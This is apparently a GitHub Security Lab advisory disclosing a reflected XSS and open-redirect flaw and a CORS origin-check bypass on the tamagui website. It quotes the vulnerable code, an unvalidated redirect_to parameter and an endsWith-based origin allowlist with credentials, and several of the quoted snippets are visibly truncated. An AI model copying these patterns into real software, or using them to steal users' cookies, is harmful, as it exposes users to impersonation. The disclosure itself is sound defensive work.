skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
February 8, 2024

GHSL-2023-258_GHSL-2023-259: Reflected XSS vulnerability and CORS issue in tamagui

Kevin Stubbings

Coordinated Disclosure Timeline


A reflected XSS vulnerability and a CORS issue are present on the tamagui website, These vulnerabilities may allow an attacker to leak the cookies of users, and thus impersonate users on the website.



Tested Version



Issue 1: reflected XSS in /login (GHSL-2023-258)

A reflected XSS vulnerabilty exists in useForwardToDashboard.tsx. If a user were to click on a specially crafted tamagui link given by an attacker, they are prompted to sign in (pressing the GitHub login button). After completion, the attacker can steal the user’s cookie and impersonate the user.

 useEffect(() => {
    const main = async () => {
      if (user && !isLoading) {
        if ( {
          location.href =
            process.env.NODE_ENV === 'development'
              ? 'http://localhost:1421'
              : ''
        } else {
          await router.replace(
            typeof router.query.redirect_to === 'string'
              ? router.query.redirect_to      // < ----- redirect_to parameter is potentially attacker controlled
              : '/account'

In addition to being an XSS vulnerability, this is also an open redirect vulnerability because an attacker can redirect a user to any domain of their choosing.

This vulnerability was found with the help of CodeQL’s XSS Query.


This issue may lead to Information Disclosure and Privilege Escalation.

Issue 2: CORS Issue in protectApiRoute (GHSL-2023-259)

A logic issue is present in the setupCors function, used to protect sensitives APIs. The middleware only checks if the origin ends with a allowlist of possible domains, allowing an attacker to bypass the filter.

export function setupCors(req: NextApiRequest, res: NextApiResponse) {
  const origin = req.headers.origin

  if (
    typeof origin === 'string' &&
    (origin.endsWith('') ||
      origin.endsWith('localhost:1421') ||
  ) {
    res.setHeader('Access-Control-Allow-Origin', origin)
    res.setHeader('Access-Control-Allow-Credentials', 'true')

If an attacker is able to get a logged in user to access a malicious website, they could steal the user’s credentials and login as them.

This vulnerability was found with the help of CodeQL’s CORS query.


This issue may lead to Information Disclosure



These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).


You can contact the GHSL team at, please include a reference to GHSL-2023-258 or GHSL-2023-259 in any communication regarding these issues.